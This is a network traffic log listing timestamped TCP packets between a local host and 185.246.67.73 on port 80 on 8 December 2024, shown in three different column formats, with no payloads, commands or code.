Dec 8, 2024 15:27:52.279787064 CET  80        49766     185.246.67.73  192.168.2.4
Dec 8, 2024 15:27:52.513241053 CET  49766     80        192.168.2.4    185.246.67.73
Dec 8, 2024 15:27:52.633934021 CET  80        49766     185.246.67.73  192.168.2.4
Dec 8, 2024 15:27:52.633944988 CET  80        49766     185.246.67.73  192.168.2.4
Dec 8, 2024 15:27:52.633953094 CET  80        49766     185.246.67.73  192.168.2.4
Dec 8, 2024 15:27:53.484991074 CET  80        49766     185.246.67.73  192.168.2.4
Dec 8, 2024 15:27:53.528748035 CET  49766     80        192.168.2.4    185.246.67.73
Dec 8, 2024 15:27:53.720293045 CET  80        49766     185.246.67.73  192.168.2.4
Dec 8, 2024 15:27:53.763155937 CET  49766     80        192.168.2.4    185.246.67.73
Dec 8, 2024 15:27:53.876612902 CET  49767     80        192.168.2.4    185.246.67.73
Dec 8, 2024 15:27:53.996004105 CET  80        49767     185.246.67.73  192.168.2.4
Dec 8, 2024 15:27:53.996098042 CET  49767     80        192.168.2.4    185.246.67.73
Dec 8, 2024 15:27:53.996576071 CET  49767     80        192.168.2.4    185.246.67.73
Dec 8, 2024 15:27:54.116329908 CET  80        49767     185.246.67.73  192.168.2.4
Dec 8, 2024 15:27:54.384280920 CET  49767     80        192.168.2.4    185.246.67.73
Dec 8, 2024 15:27:54.503727913 CET  80        49767     185.246.67.73  192.168.2.4
Dec 8, 2024 15:27:54.503739119 CET  80        49767     185.246.67.73  192.168.2.4
Dec 8, 2024 15:27:54.503746986 CET  80        49767     185.246.67.73  192.168.2.4
Dec 8, 2024 15:27:55.315921068 CET  80        49767     185.246.67.73  192.168.2.4
Dec 8, 2024 15:27:55.372510910 CET  49767     80        192.168.2.4    185.246.67.73
Dec 8, 2024 15:27:55.548507929 CET  80        49767     185.246.67.73  192.168.2.4
Dec 8, 2024 15:27:55.591269016 CET  49767     80        192.168.2.4    185.246.67.73
Dec 8, 2024 15:27:55.666476011 CET  49767     80        192.168.2.4    185.246.67.73
Dec 8, 2024 15:27:55.666712046 CET  49770     80        192.168.2.4    185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:55.785999060 CET8049770185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:55.786247969 CET8049767185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:55.786345005 CET4976780192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:55.786375999 CET4977080192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:55.786500931 CET4977080192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:55.906646967 CET8049770185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:56.138292074 CET4977080192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:56.257844925 CET8049770185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:56.257857084 CET8049770185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:56.309073925 CET8049770185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:57.123464108 CET8049770185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:57.169379950 CET4977080192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:57.239748955 CET4977180192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:57.241097927 CET4977080192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:57.356297970 CET8049770185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:57.356354952 CET4977080192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:57.359039068 CET8049771185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:57.359102011 CET4977180192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:57.359291077 CET4977180192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:57.360697985 CET8049770185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:57.360743046 CET4977080192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:57.401662111 CET4977280192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:57.483434916 CET8049771185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:57.522284985 CET8049772185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:57.522350073 CET4977280192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:57.522468090 CET4977280192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:57.642790079 CET8049772185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:57.716389894 CET4977180192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:57.836477995 CET8049771185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:57.836816072 CET8049771185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:57.872934103 CET4977280192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:58.040585995 CET8049772185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:58.040597916 CET8049772185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:58.040770054 CET8049772185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:58.612056971 CET8049766185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:58.612224102 CET4976680192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:58.689357996 CET8049771185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:58.731905937 CET4977180192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:58.853537083 CET8049772185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:58.903991938 CET4977280192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:58.924663067 CET8049771185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:58.970379114 CET4977180192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:59.088303089 CET8049772185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:59.138144016 CET4977280192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:59.207936049 CET4976680192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:59.212227106 CET4977280192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:59.212232113 CET4977180192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:59.212537050 CET4977880192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:59.331799030 CET8049778185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:59.331872940 CET4977880192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:59.331902027 CET8049772185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:59.331954002 CET4977280192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:59.332180977 CET4977880192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:59.332331896 CET8049771185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:59.332375050 CET4977180192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:59.451709032 CET8049778185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:59.685121059 CET4977880192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:59.807056904 CET8049778185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:59.807101965 CET8049778185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:59.807147026 CET8049778185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:00.660453081 CET8049778185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:00.700690031 CET4977880192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:00.896447897 CET8049778185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:00.950664997 CET4977880192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:01.008322954 CET4978480192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:01.127952099 CET8049784185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:01.130337954 CET4978480192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:01.130518913 CET4978480192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:01.250340939 CET8049784185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:01.482070923 CET4978480192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:01.601545095 CET8049784185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:01.601556063 CET8049784185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:01.601558924 CET8049784185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:02.461975098 CET8049784185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:02.513138056 CET4978480192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:02.700519085 CET8049784185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:02.747572899 CET4978480192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:02.821145058 CET4978480192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:02.821331978 CET4979080192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:02.940793037 CET8049790185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:02.940865993 CET4979080192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:02.940985918 CET4979080192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:02.940994024 CET8049784185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:02.941042900 CET4978480192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:03.060260057 CET8049790185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:03.294548988 CET4979080192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:03.414413929 CET8049790185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:03.414460897 CET8049790185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:03.414470911 CET8049790185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:03.950583935 CET4979180192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:03.951455116 CET4979080192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:04.069993019 CET8049791185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:04.070074081 CET4979180192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:04.071347952 CET8049790185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:04.071397066 CET4979080192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:04.077606916 CET4979180192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:04.197082996 CET8049791185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:04.261445045 CET4977880192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:04.262244940 CET4979280192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:04.385122061 CET8049792185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:04.385185957 CET4979280192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:04.385284901 CET4979280192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:04.435139894 CET4979180192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:04.506472111 CET8049792185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:04.569255114 CET8049791185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:04.569375038 CET8049791185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:04.732068062 CET4979280192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:04.853152037 CET8049792185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:04.853174925 CET8049792185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:04.853183985 CET8049792185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:05.398590088 CET8049791185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:05.450687885 CET4979180192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:05.636485100 CET8049791185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:05.685028076 CET4979180192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:05.749109983 CET8049792185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:05.794426918 CET4979280192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:05.984385014 CET8049792185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:06.028803110 CET4979280192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:06.101911068 CET4979180192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:06.101927996 CET4979280192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:06.102214098 CET4979880192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:06.221499920 CET8049798185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:06.221616983 CET4979880192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:06.221731901 CET8049791185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:06.221746922 CET4979880192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:06.221781969 CET4979180192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:06.222282887 CET8049792185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:06.222332954 CET4979280192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:06.341120958 CET8049798185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:06.575860977 CET4979880192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:06.720575094 CET8049798185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:06.720586061 CET8049798185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:06.720596075 CET8049798185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:07.590177059 CET8049798185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:07.638156891 CET4979880192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:07.824384928 CET8049798185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:07.872526884 CET4979880192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:07.946875095 CET4980480192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:08.069787979 CET8049804185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:08.074378967 CET4980480192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:08.074579000 CET4980480192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:08.194020987 CET8049804185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:08.419606924 CET4980480192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:08.542201042 CET8049804185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:08.542224884 CET8049804185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:08.542238951 CET8049804185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:09.395766020 CET8049804185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:09.450689077 CET4980480192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:09.632359982 CET8049804185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:09.685051918 CET4980480192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:09.759011030 CET4980480192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:09.759202957 CET4981080192.168.2.4185.246.67.73
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 8, 2024 15:28:09.878477097 CET | 80 | 49810 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:09.878542900 CET | 49810 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:09.878664017 CET | 49810 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:09.878709078 CET | 80 | 49804 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:09.878758907 CET | 49804 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:09.998367071 CET | 80 | 49810 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:10.232054949 CET | 49810 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:10.351527929 CET | 80 | 49810 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:10.351572037 CET | 80 | 49810 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:10.351660013 CET | 80 | 49810 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:10.638981104 CET | 49810 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:10.638983965 CET | 49811 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:10.757500887 CET | 49798 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:10.758619070 CET | 80 | 49811 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:10.758706093 CET | 49811 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:10.758836985 CET | 49811 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:10.759490013 CET | 49812 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:10.800641060 CET | 80 | 49810 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:10.879547119 CET | 80 | 49811 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:10.880474091 CET | 80 | 49812 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:10.880520105 CET | 49812 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:10.880629063 CET | 49812 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:10.891927958 CET | 80 | 49810 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:10.891999960 CET | 49810 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:11.000087023 CET | 80 | 49812 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:11.107023001 CET | 49811 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:11.230386972 CET | 80 | 49811 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:11.230448008 CET | 80 | 49811 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:11.232026100 CET | 49812 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:11.351594925 CET | 80 | 49812 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:11.351681948 CET | 80 | 49812 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:11.351691961 CET | 80 | 49812 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:12.098699093 CET | 80 | 49811 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:12.138209105 CET | 49811 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:12.200032949 CET | 80 | 49812 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:12.247545958 CET | 49812 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:12.332377911 CET | 80 | 49811 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:12.372616053 CET | 49811 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:12.432145119 CET | 80 | 49812 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:12.481946945 CET | 49812 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:12.555484056 CET | 49811 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:12.555485010 CET | 49812 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:12.555805922 CET | 49818 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:12.675183058 CET | 80 | 49818 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:12.675230026 CET | 80 | 49811 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:12.675407887 CET | 49811 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:12.675410032 CET | 49818 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:12.675534964 CET | 49818 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:12.675884962 CET | 80 | 49812 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:12.678369045 CET | 49812 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:12.794934988 CET | 80 | 49818 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:13.028896093 CET | 49818 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:13.148771048 CET | 80 | 49818 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:13.148809910 CET | 80 | 49818 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:13.148824930 CET | 80 | 49818 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:14.013664007 CET | 80 | 49818 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:14.060076952 CET | 49818 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:14.248296022 CET | 80 | 49818 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:14.294531107 CET | 49818 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:14.369168043 CET | 49824 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:14.490175009 CET | 80 | 49824 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:14.490294933 CET | 49824 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:14.490434885 CET | 49824 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:14.610342979 CET | 80 | 49824 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:14.842083931 CET | 49824 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:14.961452961 CET | 80 | 49824 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:14.961519003 CET | 80 | 49824 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:14.961544037 CET | 80 | 49824 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:15.827668905 CET | 80 | 49824 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:15.872612000 CET | 49824 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:16.060230970 CET | 80 | 49824 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:16.106952906 CET | 49824 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:16.179985046 CET | 49824 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:16.180166960 CET | 49830 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:16.299465895 CET | 80 | 49830 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:16.299685001 CET | 80 | 49824 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:16.299777031 CET | 49824 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:16.299787998 CET | 49830 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:16.299949884 CET | 49830 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:16.422625065 CET | 80 | 49830 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:16.654006958 CET | 49830 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:16.774172068 CET | 80 | 49830 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:16.774569988 CET | 80 | 49830 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:16.774601936 CET | 80 | 49830 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:17.342241049 CET | 49833 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:17.342464924 CET | 49830 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:17.464817047 CET | 80 | 49833 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:17.464927912 CET | 49833 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:17.465262890 CET | 80 | 49830 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:17.465312004 CET | 49830 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:17.478996038 CET | 49833 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:17.532598972 CET | 49818 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:17.539814949 CET | 49837 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:17.598347902 CET | 80 | 49833 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:17.659307957 CET | 80 | 49837 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:17.659425020 CET | 49837 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:17.698935032 CET | 49837 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:17.819032907 CET | 80 | 49837 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:17.915318012 CET | 49833 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:18.036164045 CET | 80 | 49833 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:18.036237001 CET | 80 | 49833 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:18.044586897 CET | 49837 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:18.166896105 CET | 80 | 49837 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:18.166906118 CET | 80 | 49837 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:18.166920900 CET | 80 | 49837 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:18.795914888 CET | 80 | 49833 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:18.841368914 CET | 49833 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:19.028336048 CET | 80 | 49833 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:19.037163973 CET | 80 | 49837 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:19.075722933 CET | 49833 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:19.091332912 CET | 49837 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:19.268606901 CET | 80 | 49837 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:19.325712919 CET | 49837 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:19.382812023 CET | 49837 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:19.382811069 CET | 49833 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:19.383153915 CET | 49838 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:19.502525091 CET | 80 | 49838 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:19.502551079 CET | 80 | 49837 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:19.502626896 CET | 49837 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:19.502793074 CET | 49838 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:19.502793074 CET | 49838 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:19.503366947 CET | 80 | 49833 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:19.506362915 CET | 49833 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:19.622780085 CET | 80 | 49838 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:19.857165098 CET | 49838 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:19.978355885 CET | 80 | 49838 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:19.978395939 CET | 80 | 49838 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:19.978529930 CET | 80 | 49838 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:20.866543055 CET | 80 | 49838 | 185.246.67.73 | 192.168.2.4
